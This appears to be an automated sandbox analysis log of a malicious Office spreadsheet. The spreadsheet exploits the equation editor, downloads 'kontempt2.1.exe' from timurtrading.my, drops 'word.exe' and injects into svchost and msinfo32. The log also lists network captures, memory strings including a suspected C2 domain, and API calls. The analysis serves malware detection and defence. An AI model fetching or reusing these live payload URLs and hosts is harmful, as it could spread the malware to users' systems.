79 73 31 43 5a 75 36 54 78 30 47 66 30 54 77 31 4f 4f 42 42 6a 6c 5a 38 64 36 54 31 6c 61 6f 78 4e 2b 62 62 65 50 4c 34 4f 4b 6f 39 59 75 63 30 32 5a 58 4a 67 6a 35 75 79 45 4a 64 7a 41 37 6b 31 33 47 73 73 75 77 78 38 48 47 6c 6d 4a 78 4e 79 55 43 51 77 59 41 78 4e 6c 6f 42 33 78 59 6a 2b 31 4c 4a 6d 37 66 78 76 6d 63 2b 49 32 57 44 4c 62 71 4d 71 78 41 4f 42 77 41 2f 48 6a 4c 35 63 6a 78 31 64 39 7a 56 51 71 50 41 63 34 76 41 7a 63 51 57 65 2b 68 78 75 61 63 70 53 62 30 79 4e 43 72 34 75 55 36 71 72 38 53 65 61 6d 79 45 4f 6b 73 74 30 4d 76 42 2b 61 63 77 44 41 59 34 44 6d 51 38 46 51 35 43 6d 2b 4b 45 33 6e 41 4d 52 4f 30 79 6a 33 4c 53 61 2b 72 45 46 34 64 77 54 46 46 44 70 47 76 2b 36 66 68 47 43 57 63 4a 7a 59 42 72 55 5a 4e 33 56 41 43 41 35 52 44 44 73 6b 79 5a 48 6b 39 74 42 51 43 4d 71 77 7a 32 6d 2b 63 76 63 4c 46 71 34 6b 34 45 36 6a 72 71 42 44 77 76 79 31 63 6d 33 6a 5a 67 36 50 64 6e 78 6c 57 35 44 6c 4b 39 34 79 71 4c 61 5a 4f 47 34 64 48 69 64 71 33 4c 65 71 50 43 67 56 30 49 72 58 67 44 4e 77 35 73 66 4b 6a 2f 6e 63 38 31 62 52 4e 53 79 55 64 50 76 2f 38 4f 35 78 58 4c 69 51 54 48 61 76 31 58 52 4a 53 4c 38 45 6f 68 48 53 54 42 59 6c 41 72 78 36 45 37 48 79 6c 31 31 38 43 38 6e 70 31 30 55 38 61 32 67 32 32 53 39 6c 6b 5a 35 53 70 57 2b 30 41 65 4c 44 38 79 64 6f 6a 46 57 5a 62 38 44 53 47 6f 30 7a 76 7a 55 53 4e 50 33 44 74 43 5a 41 33 74 6d 68 45 32 6d 45 53 42 72 55 73 4e 7a 4e 56 59 55 67 52 4c 41 56 43 62 62 33 6e 61 2b 31 6f 37 49 57 46 37 51 74 79 69 34 74 4c 33 52 4d 61 4d 62 53 4a 4c 66 41 61 39 4d 48 72 55 54 55 4b 54 62 71 68 47 38 63 37 64 63 39 6a 53 70 63 57 62 37 50 55 37 67 5a 4b 43 59 69 47 69 36 37 4b 37 4f 47 43 55 30 6e 57 2b 56 75 44 31 62 35 38 58 72 54 37 75 74 2b 58 6a 6e 6b 45 61 75 48 50 56 32 70 50 4d 55 58 39 6f 47 49 72 2f 79 64 55 35 59 53 4d 72 44 32 2f 75 68 61 6f 52 56 4d 50 79 68 45 54 74 71 41 57 63 76 2f 39 48 59 74 46 4e 51 35 31 57 73 44 6a 66 6c 72 51 57 50 6a 31 73 45 67 35 48 63 55 76 6f 76 38 36 32 48 48 4e 52 68 67 6c 69 2b 4b 41 4
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 22 Oct 2024 13:01:34 GMTContent-Type: text/htmlContent-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 22 Oct 2024 13:01:34 GMTContent-Type: text/htmlContent-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: openrestydate: Tue, 22 Oct 2024 13:01:50 GMTcontent-type: text/htmltransfer-encoding: chunkedx-powered-by: PHP/7.2.30content-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Q/Qp/K&T";Ct@}4l"(/ 5(Y^f>5tc0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: openrestydate: Tue, 22 Oct 2024 13:01:50 GMTcontent-type: text/htmltransfer-encoding: chunkedx-powered-by: PHP/7.2.30content-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Q/Qp/K&T";Ct@}4l"(/ 5(Y^f>5tc0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: openrestydate: Tue, 22 Oct 2024 13:01:53 GMTcontent-type: text/htmltransfer-encoding: chunkedx-powered-by: PHP/7.2.30content-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Q/Qp/K&T";Ct@}4l"(/ 5(Y^f>5tc0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: openrestydate: Tue, 22 Oct 2024 13:01:56 GMTcontent-type: text/htmltransfer-encoding: chunkedx-powered-by: PHP/7.2.30content-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Q/Qp/K&T";Ct@}4l"(/ 5(Y^f>5tc0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: openrestydate: Tue, 22 Oct 2024 13:01:58 GMTcontent-type: text/htmlcontent-length: 150x-powered-by: PHP/7.2.30connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
Source: EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: EQNEDT32.EXE, 00000002.00000002.427177451.000000000061F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://timurtrading.my/kontempt2.1.exe
Source: EQNEDT32.EXE, 00000002.00000002.427177451.000000000061F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://timurtrading.my/kontempt2.1.exee
Source: EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: uAjPOONiWk.exe, 00000009.00000002.639998204.0000000005095000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jilifish.win
Source: uAjPOONiWk.exe, 00000009.00000002.639998204.0000000005095000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jilifish.win/to3j/
Source: msinfo32.exe, 00000008.00000002.640641688.0000000061ED1000.00000008.00000001.01000000.00000008.sdmp, sqlite3.dll.8.drString found in binary or memory: http://www.sqlite.org/copyright.html.
Source: msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: msinfo32.exe, 00000008.00000003.541112304.0000000005F7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: EQNEDT32.EXE, 00000002.00000003.427086448.0000000000650000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427188921.0000000000651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://timurtrading.my/
Source: EQNEDT32.EXE, 00000002.00000002.427203634.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427177451.000000000061F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.426323426.00000000006DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://timurtrading.my/kontempt2.1.exe
Source: EQNEDT32.EXE, 00000002.00000002.427177451.000000000061F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://timurtrading.my/kontempt2.1.exec
Source: EQNEDT32.EXE, 00000002.00000002.427177451.000000000061F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://timurtrading.my/kontempt2.1.exeppC:
Source: EQNEDT32.EXE, 00000002.00000002.427203634.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.426323426.00000000006DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://timurtrading.my/kontempt2.1.exeroC:
Source: 7yj1259-.8.drString found in binary or memory: https://www.google.com/favicon.ico
Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
Source: unknownHTTPS traffic detected: 192.3.255.145:443 -> 192.168.2.22:49162 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,5_2_0046C5D0
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00459FFF
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,5_2_0046C5D0
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,5_2_00456354
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_0047C08E

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\word.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\kontempt2.1[1].exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0042C623 NtClose,6_2_0042C623
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008807AC NtCreateMutant,LdrInitializeThunk,6_2_008807AC
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087F9F0 NtClose,LdrInitializeThunk,6_2_0087F9F0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087FAE8 NtQueryInformationProcess,LdrInitializeThunk,6_2_0087FAE8
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087FB68 NtFreeVirtualMemory,LdrInitializeThunk,6_2_0087FB68
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087FDC0 NtQuerySystemInformation,LdrInitializeThunk,6_2_0087FDC0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008800C4 NtCreateFile,6_2_008800C4
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00880048 NtProtectVirtualMemory,6_2_00880048
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00880060 NtQuerySection,6_2_00880060
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00880078 NtResumeThread,6_2_00880078
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008801D4 NtSetValueKey,6_2_008801D4
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0088010C NtOpenDirectoryObject,6_2_0088010C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00880C40 NtGetContextThread,6_2_00880C40
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008810D0 NtOpenProcessToken,6_2_008810D0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00881148 NtOpenThread,6_2_00881148
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087F8CC NtWaitForSingleObject,6_2_0087F8CC
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087F900 NtReadFile,6_2_0087F900
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00881930 NtSetContextThread,6_2_00881930
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087F938 NtWriteFile,6_2_0087F938
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087FAB8 NtQueryValueKey,6_2_0087FAB8
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087FAD0 NtAllocateVirtualMemory,6_2_0087FAD0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087FA20 NtQueryInformationFile,6_2_0087FA20
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087FA50 NtEnumerateValueKey,6_2_0087FA50
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087FBB8 NtQueryInformationToken,6_2_0087FBB8
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087FBE8 NtQueryVirtualMemory,6_2_0087FBE8
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087FB50 NtCreateKey,6_2_0087FB50
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087FC90 NtUnmapViewOfSection,6_2_0087FC90
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087FC30 NtOpenProcess,6_2_0087FC30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087FC48 NtSetInformationFile,6_2_0087FC48
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087FC60 NtMapViewOfSection,6_2_0087FC60
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00881D80 NtSuspendThread,6_2_00881D80
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087FD8C NtDelayExecution,6_2_0087FD8C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087FD5C NtEnumerateKey,6_2_0087FD5C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087FEA0 NtReadVirtualMemory,6_2_0087FEA0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087FED0 NtAdjustPrivilegesToken,6_2_0087FED0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087FE24 NtWriteVirtualMemory,6_2_0087FE24
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087FFB4 NtCreateSection,6_2_0087FFB4
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087FFFC NtCreateProcessEx,6_2_0087FFFC
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0087FF34 NtQueueApcThread,6_2_0087FF34
